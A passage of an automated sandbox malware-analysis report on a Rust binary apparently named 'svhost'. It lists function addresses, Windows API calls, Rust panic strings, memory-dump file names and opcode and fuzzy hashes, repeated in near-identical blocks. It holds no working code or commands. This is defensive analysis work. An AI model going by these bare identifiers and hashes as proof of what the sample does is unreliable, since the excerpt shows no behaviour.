                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 17069307-2333694755
                                • Opcode ID: f2f85a567241b2f4ef6f439898f083abcf690a00ca8ea52e9ed0472fe85fc83b
                                • Instruction ID: 6697fabf7b0773ac2d0a7ce799906c222361105369872a9a66f5126354affe0b
                                • Opcode Fuzzy Hash: f2f85a567241b2f4ef6f439898f083abcf690a00ca8ea52e9ed0472fe85fc83b
                                • Instruction Fuzzy Hash: E0319C36A0AB9698FB15EF64E4402EC67B5AB4C758F864232CE9C177A4DF3CD045C360
                                Function 00007FF7AF6F0270 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF7AF6F0876), ref: 00007FF7AF6F02C4
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF7AF6F0876), ref: 00007FF7AF6F0341
                                Strings
                                • lock count overflow in reentrant mutexlibrary\std\src\sync\remutex.rs, xrefs: 00007FF7AF6F036D
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: lock count overflow in reentrant mutexlibrary\std\src\sync\remutex.rs
                                • API String ID: 17069307-2303981482
                                • Opcode ID: 71eb440a689b64cf102ed67ba15bffb3fce29557fc9c380a6b2e6a39506c55d0
                                • Instruction ID: 9ee6992bace51cf081d39685f72ac1e802931b8332e66cc70b7faf5d094a548e
                                • Opcode Fuzzy Hash: 71eb440a689b64cf102ed67ba15bffb3fce29557fc9c380a6b2e6a39506c55d0
                                • Instruction Fuzzy Hash: 8E318C3AB06A82AAEB14EB64D8403F86770FB58798F910631CE1D537A4DF38E955C360
                                Function 00007FF7AF703760 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                Download Yara Rule
                                APIs
                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,00007FF7AF6F4A01,?,?,?,?,?,?,?), ref: 00007FF7AF70378E
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7AF6F4A01,?,?,?,?,?,?,?), ref: 00007FF7AF70383B
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ErrorFrequencyLastPerformanceQuery
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 3362413890-2333694755
                                • Opcode ID: e6848f674747409819432b32988598a3ff7b0851c130c9c85553a9ec1e5b71ff
                                • Instruction ID: 02b522bd0aa455785877052b60cb7c39c1cc26e3ec8cdd1426c3eb11d6965666
                                • Opcode Fuzzy Hash: e6848f674747409819432b32988598a3ff7b0851c130c9c85553a9ec1e5b71ff
                                • Instruction Fuzzy Hash: 56310BA9F06B8655FB14AB65AC402F4A2A6AF8C7D4FC2D236C90D037A4DF3C9255C360
                                Function 00007FF7AF6DFF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,00000000,?,?,?,?,?,00007FF7AF73543C), ref: 00007FF7AF6DFF8C
                                • SleepConditionVariableSRW.KERNEL32(?,?,00000000,?,?,?,?,?,00007FF7AF73543C), ref: 00007FF7AF6DFFE5
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: AcquireConditionExclusiveLockSleepVariable
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 97112084-2333694755
                                • Opcode ID: 00dc880ce1bcb081a4eb0f951ec964647b52037fc4860e88687e80cbc003b6e4
                                • Instruction ID: d01498e3da479924076192e5b8d411933df4c871edda98da0847e6fa4b82f557
                                • Opcode Fuzzy Hash: 00dc880ce1bcb081a4eb0f951ec964647b52037fc4860e88687e80cbc003b6e4
                                • Instruction Fuzzy Hash: C631C926A0A7D2A5FA21AB25E8003F9AB55AF49754FC64236DE9C037F5DE3DE105C320
                                Function 00007FF7AF55AF60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79threadCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • assertion failed: (*next).value.is_some(), xrefs: 00007FF7AF55B01F
                                • assertion failed: (*tail).value.is_none()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.28\src\mpsc\queue.rs, xrefs: 00007FF7AF55B007
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: SwitchThread
                                • String ID: assertion failed: (*next).value.is_some()$assertion failed: (*tail).value.is_none()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.28\src\mpsc\queue.rs
                                • API String ID: 115865932-2995990686
                                • Opcode ID: 8d2bc782b051649799cc9570cbfc18865525a480b35688bc480304e466a5f60a
                                • Instruction ID: 992d0b173b0b800687939edd54d7be9d1d81c1a831916a440ddbfd5e03cba1af
                                • Opcode Fuzzy Hash: 8d2bc782b051649799cc9570cbfc18865525a480b35688bc480304e466a5f60a
                                • Instruction Fuzzy Hash: FF318D66B06A8284FB10AB51D4403FDA760EF84B94F958835DE6C077E4DE3DE486C360
                                Function 00007FF7AF623CE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79threadCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • assertion failed: (*tail).value.is_none()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.28\src\mpsc\queue.rs, xrefs: 00007FF7AF623D87
                                • assertion failed: (*next).value.is_some(), xrefs: 00007FF7AF623D9F
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: SwitchThread
                                • String ID: assertion failed: (*next).value.is_some()$assertion failed: (*tail).value.is_none()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.28\src\mpsc\queue.rs
                                • API String ID: 115865932-2995990686
                                • Opcode ID: fb61a3d5d4abe0ebce1ec1ddb4404fbd925273b3bf936eac6b33de281985f542
                                • Instruction ID: 5d18340187dcc3fd7d05aab0d74ac4de6e4c8dbaafda46c9767daf8317defc1c
                                • Opcode Fuzzy Hash: fb61a3d5d4abe0ebce1ec1ddb4404fbd925273b3bf936eac6b33de281985f542
                                • Instruction Fuzzy Hash: A7318C26B06A8684FB10AB55D8413FDA775EB84B94F959935CE5C077E4CF3CE482C360
                                Function 00007FF7AF695CD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00000038,00000068,-00000010,00007FF7AF8820B0,?,00007FF7AF67DA61,?,?,00007FF7AF672532), ref: 00007FF7AF695CEA
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000038,00000068,-00000010,00007FF7AF8820B0,?,00007FF7AF67DA61,?,?,00007FF7AF672532), ref: 00007FF7AF695D31
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: assertion failed: self.tail.is_none()
                                • API String ID: 17069307-2876497057
                                • Opcode ID: 91e8712b0f1a388eb5737254d26c98d63b194c00573215ee65d88d388f9c1515
                                • Instruction ID: f657cbbdc6dc8142a493680fb79b95a8d090780a1afc2f0087e12270b2fab17d
                                • Opcode Fuzzy Hash: 91e8712b0f1a388eb5737254d26c98d63b194c00573215ee65d88d388f9c1515
                                • Instruction Fuzzy Hash: 50213C26B0A7C155FB15AB21A4443F8A7A4EF447A4FD76271DE5C037E4CE3C998AC320
                                Function 00007FF7AF5A5AE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,?,?,00007FF7AF5BC289), ref: 00007FF7AF5A5B07
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,?,?,00007FF7AF5BC289), ref: 00007FF7AF5A5B6F
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 17069307-2333694755
                                • Opcode ID: b488b72194ec8da8564d3e6f752b07e36e917da8d398d6de7e1e6385d21e7c54
                                • Instruction ID: 66031b259d5158ea922c0a44392b07ebd319206b27c3abac648a2a846e706324
                                • Opcode Fuzzy Hash: b488b72194ec8da8564d3e6f752b07e36e917da8d398d6de7e1e6385d21e7c54
                                • Instruction Fuzzy Hash: D6319E26A0AB8698FB01EF65D4406EC77B0EB08B68F890232CE9D137A5DF38D155C760
                                Function 00007FF7AF5A5830 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,?,?,00007FF7AF5BC2CB), ref: 00007FF7AF5A5858
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,?,?,00007FF7AF5BC2CB), ref: 00007FF7AF5A58BD
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 17069307-2333694755
                                • Opcode ID: 49526b06b19605d7c61f8a673bf2189fa01fcc7696fff15dada227476235d752
                                • Instruction ID: 7471089daa9836423944869e2dcda335718c2f7d59b94ed17da88503404584da
                                • Opcode Fuzzy Hash: 49526b06b19605d7c61f8a673bf2189fa01fcc7696fff15dada227476235d752
                                • Instruction Fuzzy Hash: 1E31E226E0AB8298FB00EB65E4406FC77B0AB08B68F860272CE5C137A5DF3CD155C760
                                Function 00007FF7AF67CE40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,000000A8,?,00007FF7AF6740E6,?,?,?,?,?), ref: 00007FF7AF67CE70
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,000000A8,?,00007FF7AF6740E6,?,?,?,?,?), ref: 00007FF7AF67CEA5
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 17069307-2333694755
                                • Opcode ID: 3634490b14546c7612706df34775bc999b1480e6d7ef34a5f0b61fdfb3ef682b
                                • Instruction ID: 0f525b890ff0fcff14a1b5351b06f3b093fcade7562bb178fb90b0c7fb4ab9b2
                                • Opcode Fuzzy Hash: 3634490b14546c7612706df34775bc999b1480e6d7ef34a5f0b61fdfb3ef682b
                                • Instruction Fuzzy Hash: 42219426A0A7C141FA25AB05A4002F8A3A5AF88764FD54335DAFD223F0EF2CE1958720
                                Function 00007FF7AF63EC60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,00007FF7AF6219F2), ref: 00007FF7AF63EC83
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,00007FF7AF6219F2), ref: 00007FF7AF63ECEC
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 17069307-2333694755
                                • Opcode ID: f5695c2d4c70accad6d5bf8406510a626f62ef41cacbbe9caa1640f3228cf746
                                • Instruction ID: 3e8a0e703b296364766966cc3ffde9db0cfac86e9886eca0f32a5bfaa9085ba9
                                • Opcode Fuzzy Hash: f5695c2d4c70accad6d5bf8406510a626f62ef41cacbbe9caa1640f3228cf746
                                • Instruction Fuzzy Hash: 7031BE36B0AB9199FB15AB64D4401ECB7B0BB58758F850236CE9C137A4DF3CE558C360
                                Function 00007FF7AF6C9630 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70memoryCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID: root\WMI
                                • API String ID: 344208780-2712063579
                                • Opcode ID: 2b594b8c33243b3f0ce7bbbae39aafea8cdb5b787f9ed4a7ec180329b84b4bca
                                • Instruction ID: 9d188dc82d8f04c9d9dbe6cb82bf06aa1b220c73df88a8df6757b43d9ba7b5b8
                                • Opcode Fuzzy Hash: 2b594b8c33243b3f0ce7bbbae39aafea8cdb5b787f9ed4a7ec180329b84b4bca
                                • Instruction Fuzzy Hash: D5315C37A05B8586EB209F6AE4803AC77B0F758B98F549621DF9C07BA4DF78D182C310
                                Function 00007FF7AF5A5990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,?,?,00007FF7AF5C4C3B), ref: 00007FF7AF5A59B5
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,?,?,00007FF7AF5C4C3B), ref: 00007FF7AF5A5A14
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 17069307-2333694755
                                • Opcode ID: 017fe0b3fa7181915a3023bfa982b1babbeef599216695a2b425a164a0fcd9a4
                                • Instruction ID: c95e8f45ef8df63ae960a4116a3e9afb5657de4028458afb361652a8caf76149
                                • Opcode Fuzzy Hash: 017fe0b3fa7181915a3023bfa982b1babbeef599216695a2b425a164a0fcd9a4
                                • Instruction Fuzzy Hash: B8317E26B0AB81A9FB01AB6594405FC77B0BB08768FC50235CE9C137A5DF3CA195C720
                                Function 00007FF7AF5A5C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00007FF7AF5BC291), ref: 00007FF7AF5A5C63
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00007FF7AF5BC291), ref: 00007FF7AF5A5CC4
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 17069307-2333694755
                                • Opcode ID: fcd1d906898b5a2a72115a6b2e9a7487c2c1c355d5321d8fd27784957a30c559
                                • Instruction ID: 7daa8b73dcd4c9bdbb861da5257bed99d1404aaae2eb9a22666b01530bcea2e2
                                • Opcode Fuzzy Hash: fcd1d906898b5a2a72115a6b2e9a7487c2c1c355d5321d8fd27784957a30c559
                                • Instruction Fuzzy Hash: AB319F26B0AB92A9FB11AB64D8406EC77B0BB08758FC50235CE9C137A5DF38E564C360
                                Function 00007FF7AF6DDB40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: AcquireConditionExclusiveLockVariableWake
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 2350203089-2333694755
                                • Opcode ID: a97b36a4e09d766b9f03683a65d9d37622c7946bc7b0eff37b9cf09eb37c9159
                                • Instruction ID: 48ce89dda6d28354db98737970d014b805cde1423da8795f1367bb2848b5194e
                                • Opcode Fuzzy Hash: a97b36a4e09d766b9f03683a65d9d37622c7946bc7b0eff37b9cf09eb37c9159
                                • Instruction Fuzzy Hash: 2721A126E0BBC1A9FB10BB64D1402FCA7A4AB4535CF855276CAAC13BE5CF3CA154C720
                                Function 00007FF7AF6C7750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: GlobalInfoMemoryPerformanceStatus
                                • String ID: @
                                • API String ID: 3163563144-2766056989
                                • Opcode ID: 9084045c5d5ee29e75a734b19465a63664f1bdc03af5aaab08e7a08aa5f2816d
                                • Instruction ID: 291d1d23b61d30d12e867073e5e8e3d9e47e812111c475646da75e60e585c1ee
                                • Opcode Fuzzy Hash: 9084045c5d5ee29e75a734b19465a63664f1bdc03af5aaab08e7a08aa5f2816d
                                • Instruction Fuzzy Hash: 92215011948EC092E6364B6CF4463E6A374FFE43A4F009311FF98527A4DF3AD2968B00
                                Function 00007FF7AF72B290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
